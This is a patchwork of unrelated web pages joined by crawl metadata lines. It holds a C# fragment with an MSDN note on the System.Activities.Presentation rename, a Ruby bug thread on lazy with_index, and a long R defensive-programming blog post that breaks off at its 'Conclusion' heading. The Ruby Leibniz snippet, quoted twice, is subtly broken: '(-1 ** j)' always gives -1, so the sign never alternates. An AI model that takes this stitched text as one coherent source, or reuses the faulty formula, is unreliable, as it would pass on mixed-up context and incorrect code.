In the end, defensive programming may not be critical for you at all. You may never need to use it, and even if you do, the chances that as an R programmer your code will have to live up to defensive programming rules and requirements is much lower than, say, for an embedded programmer. But algorithms, including those written in R, create an increasing amount of data that is used to support major decisions. What your code spits out may decide someone’s career, whether someone can get a loan, whether they can be insured or whether their health insurance will be dropped. It may even decide a whole company’s fate. This is an inescapable consequence of the algorithmic world we now live in.
A few years ago, at a seminar on coding to FDA CDRH standards, the instructor finished by giving us his overriding rule: in the end, always code as if your life, or that of your loved ones, depended on the code you write (because it very well may someday!). This may sound dramatic in the context of R, which is primarily a statistical programming language, but the point stands: code has real-life consequences, and we owe it to those whose lives, careers or livelihoods depend on our code to give them the kind of code that we wish to rely on: well-tested, reliable and stable.
|
https://bitsandbugs.io/2018/07/27/defensive-programming-in-r/
|
CC-MAIN-2020-16
|
en
|
refinedweb
|
Part of the problem is that when a user is allowed to type a date into a text box and they input something invalid, assigning the invalid value to the field on the model will throw an exception, because the field tries to coerce the value into a date immediately.
The Original Workaround
The answer I came up with was based on the answer posted to the question, by Rod Paddock, but was a bit of a hack compared to what I wanted (keep in mind that I’m using Mongoid instead of ActiveRecord when looking at this example):
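(The gist embedded at this point in the original post has not survived in this copy. A minimal sketch of the kind of per-model workaround being described might look like the following — the Appointment model and :start_date field are placeholders, not the original code.)

class Appointment
  include Mongoid::Document

  field :start_date, :type => Date

  validates_presence_of :start_date

  # keep whatever the user typed; only store it if it parses as a date
  def start_date=(value)
    parsed = Date.parse(value.to_s) rescue nil
    @invalid_start_date = parsed ? nil : value
    write_attribute(:start_date, parsed)
  end

  # return the raw, unparseable input if there was one
  def start_date
    @invalid_start_date || read_attribute(:start_date)
  end
end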
This code effectively accomplishes what I want. It allows me to assign any arbitrary value to the model and validate the input to see if it’s even a valid date format. It lets me keep the arbitrary value around and return it from the attribute when called. It also prevents bad dates from being considered ok, if you combine it with a ‘validates_presence_of :date’ validation.
Issues With This Workaround
There are a few things that this workaround doesn’t do. For example, it is not maintainable long-term. Every time I have a date in a model, I have to repeat this code. It’s not going to work with calls to .update_attributes or .write_attributes. And, it’s not going to tell you that you have an invalid date in the model’s .errors collection. Instead, it’s going to tell you that the date is blank. No built-in validation technique will validate the value before it’s assigned to the field. We could use a custom validation class and have it re-parse the value that comes out of the attribute, though. The downside here is re-parsing the value and throwing / catching another exception, which has a cost associated with it. I’m not sure there’s a way around the parsing / exception catching, but we should at least minimize that to one call.
What I really wanted to do was abstract this solution out into something reusable, that would solve some of the remaining issues.
A Better Solution With ActiveSupport::Concern And Meta-Programming
My recent use of ActiveSupport::Concern that I talked about in another post gave me an idea, and I ran with it. I could use a concern as a module to plug into a model, and provide a method that would not only define the date field for me, but provide accessor methods that know how to handle all of the parsing and storage needs that I have. I could also use a better data structure to store the results of the parsing, which would give me a better way to handle a custom validator without having to re-parse the input.
The result of a day’s hacking this weekend is the following concern:
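(Again, the embedded gist is missing from this copy. The sketch below reconstructs its rough shape from the description that follows — names such as set_date_field_value, get_date_field_value and DateFieldValidator are taken from that description; everything else is an assumption rather than the original source.)

module Mongoid
  module DateField
    extend ActiveSupport::Concern

    included do
      # the custom validator is included automatically
      validates_with Mongoid::DateField::DateFieldValidator
    end

    module ClassMethods
      # defines the date field plus reader / writer accessors for it
      def date_field(name)
        field name, :type => Date

        class_eval <<-EOL
          def #{name}
            get_date_field_value(:#{name})
          end

          def #{name}=(value)
            set_date_field_value(:#{name}, value)
          end
        EOL
      end
    end

    # field name => raw invalid input, whenever parsing failed
    def invalid_date_values
      @invalid_date_values ||= {}
    end

    def set_date_field_value(name, value)
      parsed = Date.parse(value.to_s) rescue nil
      if parsed
        invalid_date_values.delete(name)
        write_attribute(name, parsed)
      else
        invalid_date_values[name] = value
      end
    end

    def get_date_field_value(name)
      invalid_date_values[name] || read_attribute(name)
    end

    # deliberately coupled to the data structure above
    class DateFieldValidator < ActiveModel::Validator
      def validate(record)
        record.invalid_date_values.each_key do |name|
          record.errors.add(name, "is not a valid date")
        end
      end
    end
  end
end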
The first thing you’ll notice is that this concern is namespaced for Mongoid. I did this specifically because the solution I built only works with Mongoid, at this point. I don’t use any of the usual ActiveRecord stuff in this project, so there was no need for me to build support for ActiveRecord. Someone else might be able to make it work with ActiveRecord fairly easily, though.
Next, note the nested ClassMethods module. This module name is recognized by ActiveSupport::Concern and tells the concern to turn all of the methods inside of it into class level methods on the class that is including the concern. The end result is that my model will have a ‘date_field’ method that can be called in the class definition.
The implementation of the date_field method uses some meta-programming to inject a few things into the class when the method is called. First, it defines the date field according to the name that you provide. It then defines the accessor methods for reading and writing the attribute’s value. All of this is done inside of a class_eval call, using string injection with a <<-EOL … EOL heredoc. This causes ruby to execute all of the code in that string in the context of the class on which class_eval is being called. I’m normally not a fan of this style of meta-programming, but I think this is an acceptable use to keep the code clean and easy to read and understand.
The accessor methods don’t do anything more than delegate to another method in the concern. In case of the assignment access, the set_date_field_value method does the parsing and storage of the bad result or good result. The get_date_field_value then does the opposite – checking to see if a bad value is stored and returning either the bad value or the actual attribute value, depending. All of this is facilitated with a simple hash that uses the field name as the key and tells me whether the input value is valid or not.
Last, there is a custom validator class at the bottom of the code. This validator uses the data structure from the concern’s input parsing to determine whether or not the value is valid, and injects an error message into the model’s .errors collection if it’s not valid. I know that the validator is coupled tightly to my concern’s implementation and data structure. In this case, I’m ok with that. This validator is not meant to be used with any other fields, and is very directly a part of this solution’s implementation detail. The validator is even included automatically, so that I never have to set it up manually inside of my actual model.
Mongoid::DateField In Action
Now that I have this in place, my model is reduced to the following:
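(A sketch, matching the hypothetical Appointment model used above rather than the missing original snippet:)

class Appointment
  include Mongoid::Document
  include Mongoid::DateField

  date_field :start_date
end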
That’s it. My model will now validate any arbitrary input for a date field, in a clean and easily re-usable manner.
For my actual application, here’s what that looks like:
Notice the ‘Start Date’ field on the right hand side. When I fill in this field with something invalid and click save, I get the error message stating that it’s not valid and needs to be in a correct format. The value is also retained on the form so that the person can see what they did wrong.
One Remaining Issue: Mass Attribute Updates
Although I’ve solved the majority of the problems I had with this solution, there is one remaining issue: I can’t call .write_attributes or .update_attributes, and by extension, cannot call .create or .new with a hash of values that contains the date fields. Since the solution only provides the parsing and validation during a call to the get and set accessor methods, the parsing and validation doesn’t run and an exception would be thrown for an invalid date.
The workaround here is that I have to reject the date values from the form’s params when posting to the server and then manually assign them to the attributes:
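(A sketch of what that controller-side workaround can look like — again using the hypothetical Appointment model and :start_date field rather than the original code:)

def update
  appointment = Appointment.find(params[:id])

  # mass-assign everything except the date field...
  appointment.update_attributes(params[:appointment].except(:start_date))

  # ...then assign the date through its accessor so the parsing runs
  appointment.start_date = params[:appointment][:start_date]

  appointment.save ? redirect_to(appointment) : render(:edit)
end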
It’s a small price to pay for having a generally clean solution. However, I would love to solve this and be able to pass the invalid date strings into .write_attributes without worrying. I would love to see a modification to my solution that allows this to happen… *wink wink nudge nudge* 🙂
|
https://lostechies.com/derickbailey/2011/06/13/partially-solving-the-date-validation-deficiency-of-rails-3-and-mongoid-2-models/
|
CC-MAIN-2020-16
|
en
|
refinedweb
|
Provided by: libxml-libxml-perl_2.0128+dfsg-5_amd64
NAME
XML::LibXML::Attr - XML::LibXML Attribute Class
SYNOPSIS
use XML::LibXML;
# Only methods specific to Attribute nodes are listed here,
# see the XML::LibXML::Node manpage for other methods
$attr = XML::LibXML::Attr->new($name [,$value]);
$string = $attr->getValue();
$string = $attr->value;
$attr->setValue( $string );
$node = $attr->getOwnerElement();
$attr->setNamespace($nsURI, $prefix);
$bool = $attr->isId;
$string = $attr->serializeContent;
METHODS
new
$attr = XML::LibXML::Attr->new($name [,$value]);
Class constructor. If you need to work with ISO encoded strings, you should always use the "createAttribute" of XML::LibXML::Document.
getValue
$string = $attr->getValue();
Returns the value stored for the attribute. If undef is returned, the attribute has no value.
setNamespace
$attr->setNamespace($nsURI, $prefix);
This function tries to bind the attribute to a given namespace. If $nsURI is undefined or empty, the function discards any previous association of the attribute with a namespace. If the namespace was not previously declared in the context of the attribute, this function will fail. In this case you may wish to call setNamespace() on the ownerElement. If the namespace URI is non-empty and declared in the context of the attribute, but only with a different (non-empty) prefix, then the attribute is still bound to the namespace but gets a different prefix than $prefix. The function also fails if the prefix is empty but the namespace URI is not (because unprefixed attributes should by definition belong to no namespace). This function returns 1 on success, 0 otherwise.
isId
$bool = $attr->isId;
Determine whether an attribute is of type ID. For documents with a DTD, this information is only available if DTD loading/validation has been requested. For HTML documents parsed with the HTML parser ID detection is done automatically. In XML documents, all "xml:id" attributes are considered to be of type ID.
serializeContent($docencoding)
$string = $attr->serializeContent;
This function is not part of the DOM API. It returns attribute content in the form in which it serializes into XML, that is with all meta-characters properly quoted and with raw entity references (except for entities expanded during parse time). Setting the optional $docencoding flag to 1 enforces document encoding for the output string (which is then passed to Perl as a byte string). Otherwise the string is passed to Perl as (UTF-8 encoded) characters.
AUTHORS
Matt Sergeant, Christian Glahn, Petr Pajas
VERSION
2.0128
2001-2007, AxKit.com Ltd. 2002-2006, Christian Glahn. 2006-2009, Petr Pajas.
LICENSE
This program is free software; you can redistribute it and/or modify it under the same terms as Perl itself.
|
http://manpages.ubuntu.com/manpages/bionic/man3/XML::LibXML::Attr.3pm.html
|
CC-MAIN-2020-16
|
en
|
refinedweb
|
The plane object has WAY to many tris/verts for what I want. And I can't manipulate the verts. Or delete some of them.
I've had that issue as well -- the plane prefab is (I believe) 10x10 verts, and also 10x10 units big. I found myself wanting a 2x2 quad at size 1x1, so I can look at the scale to see how big the thing is. I used procedural mesh creation to solve this, similar to Statements example.
Answer by Statement
·
Mar 07, 2011 at 05:51 PM
You can create a new Mesh like so:
using UnityEngine;
[RequireComponent(typeof(MeshRenderer)), RequireComponent(typeof(MeshFilter))]
public class CreatePlaneMeshExample : MonoBehaviour
{
void Start()
{
GetComponent<MeshFilter>().mesh = CreatePlaneMesh();
}
Mesh CreatePlaneMesh()
{
Mesh mesh = new Mesh();
Vector3[] vertices = new Vector3[]
{
new Vector3( 1, 0, 1),
new Vector3( 1, 0, -1),
new Vector3(-1, 0, 1),
new Vector3(-1, 0, -1),
};
Vector2[] uv = new Vector2[]
{
new Vector2(1, 1),
new Vector2(1, 0),
new Vector2(0, 1),
new Vector2(0, 0),
};
int[] triangles = new int[]
{
0, 1, 2,
2, 1, 3,
};
mesh.vertices = vertices;
mesh.uv = uv;
mesh.triangles = triangles;
return mesh;
}
}
If I procedurally create a Mesh in the editor, then turn its game object into a prefab, the mesh is gone when I next load the scene. Does that seem like expected behaviour? Should a procedural mesh be able to live in a prefab?
can u explain me..hw u r creating that plane....?? ty
@KrishnaMV: ?
@yoyo: Yeah, you need to create a new asset via AssetDatabase.CreateAsset - otherwise the mesh has no backing storage.
@yoyo The game object is one thing and the mesh is another thing. You have to "save both things" if you want a prefab with a mesh on it. Check out AssetDatabase.CreateAsset. If you dont save the mesh as well, it will be lost. This is expected behaviour. The only way a mesh could be saved without creating an asset would be for a game object in a scene to reference the mesh. If you then just save the scene, Unity will understand that the mesh belongs to the scene and serialise it into the scene itself. For prefabs you have to save the mesh yourself.
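A minimal editor-only sketch of the AssetDatabase.CreateAsset approach mentioned above (not part of the original thread; the menu path and asset path are just examples):

using UnityEngine;
using UnityEditor;

public static class SaveMeshExample
{
    [MenuItem("Tools/Save Selected Mesh As Asset")]
    static void SaveSelectedMesh()
    {
        // grab the mesh from the currently selected game object
        var meshFilter = Selection.activeGameObject.GetComponent<MeshFilter>();
        // give the mesh backing storage so a prefab can keep referencing it
        AssetDatabase.CreateAsset(meshFilter.sharedMesh, "Assets/GeneratedQuad.asset");
        AssetDatabase.SaveAssets();
    }
}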
Answer by Jesse Anders
·
Mar 07, 2011 at 05:52 PM
You can create one in a modeling program and import it. Or, you can write code (or use existing code) to create a 'quad' mesh procedurally.
I think there's a 'create plane mesh' script on the script wiki that allows you to specify the subdivision level, so you might look for that. If you get stuck though, post back (I have a script lying around somewhere that should do just what you're wanting).
[Drat...thwarted by a complete example! :)]
[@The OP: Note however that the above code will create a mesh procedurally at run time. If you just want a mesh model or quad prefab that can be shared between scenes/game objects, that can be done as well. (I have a 'quad' prefab that was generated this way that I use for sprites and that sort of thing.)]
I do believe a neater solution would be to create a plane mesh model and import it into Unity from a modeling software though.
Sure, that works as well. The reason I did it procedurally was a) I couldn't figure out how to get Unity not to rotate/flip/re-arrange my Blender model on import (although that might have been user error), and b) I was already doing a lot of procedural mesh generation in the application, so writing a little code to generate some meshes that I needed was no big deal. But sure, one should use whatever method they find to be easiest and most straightforward.
both of these are right answers. I feel bad for having to give the answer "tick" to Statement for his code. And even more so, because I'll probably go with the import a mesh plain option, which deserves a tick in and of itself.
Answer by dentedpixel
·
Jan 19, 2012 at 05:30 PM
This script seems to be the most effective way to create a simple plane without having to bother with a 3d Editor:
Best answer for me, thanks!
Answer by Banglemoose
·
Mar 22, 2015 at 07:47 PM
Old thread but the Quad is 2 polygons for anyone who comes across.
|
https://answers.unity.com/questions/51002/how-to-create-a-four-vertex-two-tri-square-polygon.html
|
CC-MAIN-2020-16
|
en
|
refinedweb
|
Automating Downloads on American Fact Finder
2019/07/18
American Fact Finder is a handy tool that allows the user to navigate to data tables of census data. Despite having the API for downloading from the American Community Survey, I occasionally need to download data from the Fact Finder simply because I do not know which dataset I was looking for. As far as I know, the API does not provide a tool that allow searching using keywords such as ‘tenure’. I decided to automate this process because I had to validate data. The validation process is to aggregate data to a larger geographical area and compare them with the aggregation from Fact Finder.
Let’s get started. The Fact Finder is an asynchronous web application, meaning that parts of the page loads up after the request was sent by the client. This implies that I cannot use the requests library to download the tables. For this reason, I used Selenium webdriver to create an instance of an automated browser to navigate to the downloads. The snippet below is to configure the browser and browse the search page.
import time
from selenium import webdriver

browser = webdriver.Chrome(executable_path=r'C:\Users\skhongro.DPU\Documents\chromedriver.exe')
link = ''
browser.get(link)
Next is the major part of the automation. The way this works is by looking for the search box, typing in the keyword, clicking search, and checking the checkboxes of the results to download. In this case, I want to download the five-year estimate ACS data of the tables listed on the first line, from 2009 to 2010. Note that there is a limit of 40 tables on a single download. To start the process, manually select the geography, and randomly choose a table. The reason for having the table is that the algorithm removes one filter every time a table is to be fetched. The table is the first filter, the geography is the second.
Execute the codes below. Sit back and enjoy the auto clicking.
tbl_nbrs = ["B01001","B15002","B03002","B17001","B23001","B25002","B25004","B25024","B25032","B25007","B11016","B25106","B25064","B25063","B19013","B19001","B25072","B19019","B19001"]
for tbl_nbr in tbl_nbrs[1:5]:
    print(tbl_nbr)
    browser.find_element_by_class_name('remove-it').click()
    time.sleep(3)
    browser.find_element_by_id('searchTopicInput').click()
    browser.find_element_by_id('searchTopicInput').send_keys(tbl_nbr)
    browser.find_element_by_id('df-go-div').find_element_by_class_name('button-g').click()
    time.sleep(1)
    cols = browser.find_element_by_id('resulttable').find_elements_by_class_name('yui-dt-col-d_dataset')
    check = []
    for col in cols[1:]:
        if(col.text[5:]=='ACS 5-year estimates'):
            check.append(1)
        else:
            check.append(0)
    checkboxes = browser.find_elements_by_name('prod')
    for x in range(0,len(check)):
        if(check[x]==1):
            checkboxes[x].click()
After the tables have been chosen, you can now click download. Since I am downloading 40 tables at a time, I do not want to wait until all files are processed before I can hit the download button. This is why I added some extra code to watch the button for me. Although this is not a good design, I only wanted a quick piece of code that works. If this were to be executed regularly I would recommend using waits to wait for a DOM element to be ready. The same goes for the automation part, which relies on the sleep function.
while(1):
    if(browser.find_element_by_id('yui-gen5-button').is_enabled()):
        browser.find_element_by_id('yui-gen5-button').click()
        break
    time.sleep(5)
# browser.find_element_by_id('yui-gen14-button').is_enabled()
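As a rough sketch of the explicit-wait approach mentioned above (using the same button id as this script; the timeout value is arbitrary):

from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC

# block until the download button becomes clickable, then click it
wait = WebDriverWait(browser, 600)
download_button = wait.until(EC.element_to_be_clickable((By.ID, 'yui-gen5-button')))
download_button.click()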
|
https://siravich-khongrod.github.io/blog/automating-download-on-American-Fact-Finder.html
|
CC-MAIN-2020-16
|
en
|
refinedweb
|
strcat() prototype
char* strcat( char* dest, const char* src );
The
strcat() function takes two arguments: dest and src. This function appends a copy of the character string pointed to by src to the end of the string pointed to by dest, followed by a terminating null character. It is defined in the <cstring> header file.
strcat() Parameters
dest: Pointer to a null terminating string to append to.
src: Pointer to a null terminating string that is to be appended.
strcat() Return value
The strcat() function returns dest, the pointer to the destination string.
Example: How strcat() function works
#include <cstring>
#include <iostream>
using namespace std;

int main()
{
    char dest[50] = "Learning C++ is fun";
    char src[50] = " and easy";
    strcat(dest, src);
    cout << dest;
    return 0;
}
When you run the program, the output will be:
Learning C++ is fun and easy
|
https://www.programiz.com/cpp-programming/library-function/cstring/strcat
|
CC-MAIN-2020-16
|
en
|
refinedweb
|
This program takes two positive integers as input from the user and calculates GCD using recursion.
Visit this page to learn how you can calculate the GCD using loops.
GCD of Two Numbers using Recursion
#include <stdio.h>

int hcf(int n1, int n2);

int main()
{
    int n1, n2;
    printf("Enter two positive integers: ");
    scanf("%d %d", &n1, &n2);
    printf("G.C.D of %d and %d is %d.", n1, n2, hcf(n1, n2));
    return 0;
}

int hcf(int n1, int n2)
{
    if (n2 != 0)
        return hcf(n2, n1 % n2);
    else
        return n1;
}
Output
Enter two positive integers: 366 60 G.C.D of 366 and 60 is 6.
In this program, recursive calls are made until the value of n2 is equal to 0.
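For the sample input above, the calls unfold as hcf(366, 60) → hcf(60, 366 % 60) = hcf(60, 6) → hcf(6, 60 % 6) = hcf(6, 0); at that point n2 is 0 and the function returns 6, the G.C.D.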
|
https://www.programiz.com/c-programming/examples/hcf-recursion
|
CC-MAIN-2020-16
|
en
|
refinedweb
|
Unlike vsprintf(), the maximum number of characters that can be written to the buffer is specified in
vsnprintf().
vsnprintf() prototype
int vsnprintf( char* buffer, size_t buf_size, const char* format, va_list vlist );
The
vsnprintf() function writes the string pointed to by format to a character string buffer. The maximum number of characters that can be written is buf_size. After the characters are written, a terminating null character is added. If buf_size is equal to zero, nothing is written and buffer may be a null pointer.
The string format may contain format specifiers starting with % which are replaced by the values of variables that are passed as a list vlist.
It is defined in <cstdio> header file.
vsnprintf() Parameters
- buffer: Pointer to a character string to write the result.
- buf_size: Maximum number of characters to write.
- format: Pointer to a null-terminated character string specifying how to interpret the data.
- vlist: A variable argument list containing the values to be written.
vsnprintf() Return value
- If successful, the vsnprintf() function returns the number of characters written.
- On failure it returns a negative value.
- When the length of the formatted string is greater than buf_size, it needs to be truncated. In such cases, the vsnprintf() function returns the total number of characters excluding the terminating null character which would have been written, if the buf_size limit was not imposed.
Example: How vsnprintf() function works
#include <cstdio>
#include <cstdarg>

void write(char* buf, int buf_size, const char *fmt, ...)
{
    va_list args;
    va_start(args, fmt);
    vsnprintf(buf, buf_size, fmt, args);
    va_end(args);
}

int main ()
{
    char buffer[100];
    char fname[20] = "Bjarne";
    char lname[20] = "Stroustrup";
    char lang[5] = "C++";
    write(buffer, 27, "%s was created by %s %s\n", lang, fname, lname);
    printf("%s", buffer);
    return 0;
}
When you run the program, the output will be:
C++ was created by Bjarne
|
https://www.programiz.com/cpp-programming/library-function/cstdio/vsnprintf
|
CC-MAIN-2020-16
|
en
|
refinedweb
|
As you may know, Web scraping is essentially extracting data from websites. Doing such task in a high-level programming language like Python is very handy and powerful. In this tutorial, you will learn how to use requests and BeautifulSoup to scrape weather data from Google search engine.
Although, this is not the perfect and official way to get the actual weather for a specific location, because there are hundreds of weather APIs out there to use. However, it is a great exercise for you to get familiar with scraping.
Related: How to Make an Email Extractor in Python.
Alright, let's get started, installing the required dependencies:
pip3 install requests bs4
First, let's experiment a little bit, open up a Google search bar and type for instance: "weather london", you'll see the official weather, let's right click and inspect HTML code as shown in the following figure:
Note: Google does not have its appropriate weather API, as it also scrapes weather data from weather.com, so we are essentially scraping from it.
You'll be forwarded to HTML code that is responsible for displaying the region, day and hour, and the actual weather:
Great, let's try to extract these information in a Python interactive shell quickly:
In [7]: soup = BeautifulSoup(requests.get("").content)

In [8]: soup.find("div", attrs={'id': 'wob_loc'}).text
Out[8]: 'London, UK'
Don't worry about how we created the soup object, all you need to worry about right now is how you can grab that information from HTML code, all you have to specify to soup.find() method is the HTML tag name and the matched attributes, in this case, a div element with an id of "wob_loc" will get us the location.
Similarly, let's extract current day and time:
In [9]: soup.find("div", attrs={"id": "wob_dts"}).text Out[9]: 'Wednesday 3:00 PM'
The actual weather:
In [10]: soup.find("span", attrs={"id": "wob_dc"}).text Out[10]: 'Sunny'
Alright, now you are familiar with it, let's create our quick script for grabbing more information about the weather ( as much information as we can ). Open up a new Python script and follow with me.
First, let's import necessary modules:
from bs4 import BeautifulSoup as bs
import requests
It is worth noting that Google tries to prevent us from scraping its website programmatically, as it is an unofficial way to get data; Google provides a convenient alternative, the Custom Search Engine. Just for educational purposes, we are going to pretend that we are a legitimate web browser, so let's define the user agent:
USER_AGENT = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
# US english
LANGUAGE = "en-US,en;q=0.5"
Let's define a function that given a URL, it tries to extract all useful weather information and return it in a dictionary:
def get_weather_data(url):
    session = requests.Session()
    session.headers['User-Agent'] = USER_AGENT
    session.headers['Accept-Language'] = LANGUAGE
    session.headers['Content-Language'] = LANGUAGE
    html = session.get(url)
    # create a new soup
    soup = bs(html.text, "html.parser")
All we did here is create a session with that user agent and language, download the HTML code from the web using session.get(url), and finally create the BeautifulSoup object with an HTML parser.
Let's get current region, weather, temperature and actual day and hour:
    # store all results on this dictionary
    result = {}
    # extract region
    result['region'] = soup.find("div", attrs={"id": "wob_loc"}).text
    # extract temperature now
    result['temp_now'] = soup.find("span", attrs={"id": "wob_tm"}).text
    # get the day and hour now
    result['dayhour'] = soup.find("div", attrs={"id": "wob_dts"}).text
    # get the actual weather
    result['weather_now'] = soup.find("span", attrs={"id": "wob_dc"}).text
Since the current precipitation, humidity and wind are displayed, why not grab them ?
    # get the precipitation
    result['precipitation'] = soup.find("span", attrs={"id": "wob_pp"}).text
    # get the % of humidity
    result['humidity'] = soup.find("span", attrs={"id": "wob_hm"}).text
    # extract the wind
    result['wind'] = soup.find("span", attrs={"id": "wob_ws"}).text
Let's try to get weather information about the next few days, if you take some time finding the HTML code of it, you'll find something similar to this:
<div class="wob_df" style="display:inline-block;line-height:1;text-align:center;-webkit-transition-duration:200ms,200ms,200ms;-webkit-transition-property:background-image,border,font-weight;font-weight:13px;height:90px;width:73px" data- <div class="vk_lgy" style="padding-top:7px;line-height:15px" aria-Sat</div> <div style="display:inline-block"><img style="margin:1px 4px 0;height:48px;width:48px" alt="Sunny" src="//ssl.gstatic.com/onebox/weather/48/sunny.png" data-</div> <div style="font-weight:normal;line-height:15px;font-size:13px"> <div class="vk_gy" style="display:inline-block;padding-right:5px"><span class="wob_t" style="display:inline">25</span><span class="wob_t" style="display:none">77</span>°</div> <div class="vk_lgy" style="display:inline-block"><span class="wob_t" style="display:inline">17</span><span class="wob_t" style="display:none">63</span>°</div> </div> </div>
Not human readable, I know, but this parent div contains all the information about one of the next days, in this case "Saturday", as shown in the aria-label attribute of the first child div with the class vk_lgy. The weather description is within the alt attribute of the img element, here "Sunny". As for the temperature, there is a max and a min, each in both Celsius and Fahrenheit; these lines of code take care of everything:
    # get next few days' weather
    next_days = []
    days = soup.find("div", attrs={"id": "wob_dp"})
    for day in days.findAll("div", attrs={"class": "wob_df"}):
        # extract the name of the day
        day_name = day.find("div", attrs={"class": "vk_lgy"}).attrs['aria-label']
        # get weather status for that day
        weather = day.find("img").attrs["alt"]
        temp = day.findAll("span", {"class": "wob_t"})
        # maximum temperature in Celsius, use temp[1].text if you want fahrenheit
        max_temp = temp[0].text
        # minimum temperature in Celsius, use temp[3].text if you want fahrenheit
        min_temp = temp[2].text
        next_days.append({"name": day_name, "weather": weather, "max_temp": max_temp, "min_temp": min_temp})
    # append to result
    result['next_days'] = next_days
    return result
Now result dictionary got everything we need, let's finish up the script by parsing command line arguments using argparse:
if __name__ == "__main__":
    URL = ""
    import argparse
    parser = argparse.ArgumentParser(description="Quick Script for Extracting Weather data using Google Weather")
    parser.add_argument("region", nargs="?", help="""Region to get weather for, must be available region.
                        Default is your current location determined by your IP Address""", default="")
    # parse arguments
    args = parser.parse_args()
    region = args.region
    URL += region
    # get data
    data = get_weather_data(URL)
Displaying everything:
    # print data
    print("Weather for:", data["region"])
    print("Now:", data["dayhour"])
    print(f"Temperature now: {data['temp_now']}°C")
    print("Description:", data['weather_now'])
    print("Precipitation:", data["precipitation"])
    print("Humidity:", data["humidity"])
    print("Wind:", data["wind"])
    print("Next days:")
    for dayweather in data["next_days"]:
        print("="*40, dayweather["name"], "="*40)
        print("Description:", dayweather["weather"])
        print(f"Max temperature: {dayweather['max_temp']}°C")
        print(f"Min temperature: {dayweather['min_temp']}°C")
If you run this script, it will automatically grab the weather of your current region determined by your IP address. However, if you want a different region, you can pass it as an argument:
C:\weather-extractor>python weather.py "New York"
This will show weather data of New York state in the US:
Weather for: New York, NY, USA
Now: wednesday 2:00 PM
Temperature now: 20°C
Description: Mostly Cloudy
Precipitation: 0%
Humidity: 52%
Wind: 13 km/h
Next days:
======================================== wednesday ========================================
Description: Mostly Cloudy
Max temperature: 21°C
Min temperature: 12°C
======================================== thursday ========================================
Description: Sunny
Max temperature: 22°C
Min temperature: 14°C
======================================== friday ========================================
Description: Partly Sunny
Max temperature: 28°C
Min temperature: 18°C
======================================== saturday ========================================
Description: Sunny
Max temperature: 30°C
Min temperature: 19°C
======================================== sunday ========================================
Description: Partly Sunny
Max temperature: 29°C
Min temperature: 21°C
======================================== monday ========================================
Description: Partly Cloudy
Max temperature: 30°C
Min temperature: 19°C
======================================== tuesday ========================================
Description: Mostly Sunny
Max temperature: 26°C
Min temperature: 16°C
======================================== wednesday ========================================
Description: Mostly Sunny
Max temperature: 25°C
Min temperature: 19°C
Alright, we are done with this tutorial, I hope this was helpful for you to understand how you can combine requests and BeautifulSoup to grab data from web pages.
By the way, there is another tutorial for extracting YouTube videos data in Python or accessing wikipedia pages in Python !
Read also: How to Extract All Website Links in Python.
Happy Scraping ♥
|
https://www.thepythoncode.com/article/extract-weather-data-python
|
CC-MAIN-2020-16
|
en
|
refinedweb
|
expo-asset provides an interface to Expo's asset system. An asset is any file that lives alongside the source code of your app that the app needs at runtime. Examples include images, fonts, and sounds. Expo's asset system integrates with React Native's, so that you can refer to files with require('path/to/file').
expo install expo-asset
To use this in a bare React Native app, follow the installation instructions.
import { Asset } from 'expo-asset';
Asset.fromModule(module).downloadAsync for convenience.
require('path/to/file'). Can also be just one module without an Array.
require('path/to/file') for the asset
const imageURI = Asset.fromModule(require('./assets/snack-icon.png')).uri;
imageURI gives the remote URI that the contents of assets/snack-icon.png can be read from. The path is resolved relative to the source file that this code is evaluated in.
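A small sketch of pre-loading (downloading and caching) the same asset before use — the file path is the one from the snippet above, and the function name is just an example:

import { Asset } from 'expo-asset';

async function loadIcon() {
  const asset = Asset.fromModule(require('./assets/snack-icon.png'));
  await asset.downloadAsync();
  // localUri points at the downloaded copy once it exists
  return asset.localUri || asset.uri;
}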
|
https://docs.expo.io/versions/v36.0.0/sdk/asset/
|
CC-MAIN-2020-16
|
en
|
refinedweb
|
Creates a new Sprite object.
The
rect argument is defined in
pixels of the texture. A Rect(50.0f, 10.0f, 200.0f, 140.0f) would create a left to right
range from 50.0f to 50.0f + 200.0f = 250.0f. The bottom to top range would be 10.0f to
10.0f + 140.0f = 150.0f.
The third argument
pivot determines what becomes the center
of the Sprite. This is a
Vector2 relative to the
rect where Vector2(0.0f, 0.0f) is the bottom
left and Vector2(1.0f, 1.0f) is the top right. The pixelsPerUnit value controls
the size of the sprite. Reducing this below 100 pixels per world unit increases the size of
the sprite. The
extrude value defines the number of pixels which surround the
Sprite.
This is useful if the Sprite is included in an atlas.
meshType selects whether
FullRect or
Tight is used. Finally
border determines the rectangle size of the
Sprite. The Sprite can be provided spaces around it.
See Also: SpriteRenderer class.
// Create a Sprite at start-up. // Assign a texture to the sprite when the button is pressed.
using UnityEngine;
public class spriteCreate : MonoBehaviour { public Texture2D tex; private Sprite mySprite; private SpriteRenderer sr;
void Awake() { sr = gameObject.AddComponent<SpriteRenderer>() as SpriteRenderer; sr.color = new Color(0.9f, 0.9f, 0.9f, 1.0f);
transform.position = new Vector3(1.5f, 1.5f, 0.0f); }
void Start() { mySprite = Sprite.Create(tex, new Rect(0.0f, 0.0f, tex.width, tex.height), new Vector2(0.5f, 0.5f), 100.0f); }
void OnGUI() { if (GUI.Button(new Rect(10, 10, 100, 30), "Add sprite")) { sr.sprite = mySprite; } } }
|
https://docs.unity3d.com/ja/2018.2/ScriptReference/Sprite.Create.html
|
CC-MAIN-2020-16
|
en
|
refinedweb
|
Subject: Re: [boost] [explore] Extending namespace std
From: Maurizio Vitale (maurizio.vitale_at_[hidden])
Date: 2009-12-16 09:54:19
>>>>> "Robert" == Robert Ramey <ramey_at_[hidden]> writes:
Robert> Jeffrey Faust wrote:
>>> In regards to extending namespace std, I understand what the
>>> standard says and I think I understand the reasons behind it.
>>> One could add something to namespace std that conflicts with an
>>> existing item, changing the behavior. This is undefined
>>> behavior, and the standard is right in restricting it. I don't
>>> believe this problem exists for this library in how we plan to
>>> extend std.
Robert> How can anyone possibly know that? That is, how could two
Robert> different developers who didn't know each other possibly
Robert> know that they weren't going to conflict?
Robert> Of course if you wanted to officially extended the namespace
Robert> that would be a different thing entirely.
It is more than conflict: the C++ standard fully defines the content of
std and compilers are not required to implement it as they implement
other namespaces, as long as they behave as if such a namespace was
defined.
In particular, turning the entire namespace std { } block into a
compiler-time nop is entirely ok.
